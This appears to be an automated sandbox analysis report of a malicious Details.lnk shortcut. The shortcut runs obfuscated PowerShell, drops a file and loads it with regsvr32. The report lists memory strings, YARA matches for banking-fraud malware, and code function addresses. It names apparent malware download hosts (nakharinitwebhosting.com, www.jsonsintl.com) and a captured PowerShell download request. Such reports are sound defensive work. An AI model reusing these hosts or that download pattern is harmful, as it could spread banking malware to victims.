                    Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                    Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.476380222.0000021B5F586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000002.00000002.477597514.0000021B76452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
                    Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                    Source: svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                    Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                    Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                    Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                    Source: svchost.exe, 00000014.00000003.671989281.0000024B5DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknownDNS traffic detected: queries for: www.jsonsintl.com
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,
                    Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 4.2.regsvr32.exe.2330000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Source: Details.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                    Source: Details.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
                    Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\PZgVlkJBEGfsjmei\Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9F1AD0CB3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9F1AD1EE0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA12B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA4A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA5E01
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA5CAD
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA6850
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA443C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA53FB
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00AC0000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A9D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B7B2
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_022F0000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C819
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012864
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA51CA7FF0 appears 31 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA51CAB3B0 appears 148 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA51CABD70 appears 113 times
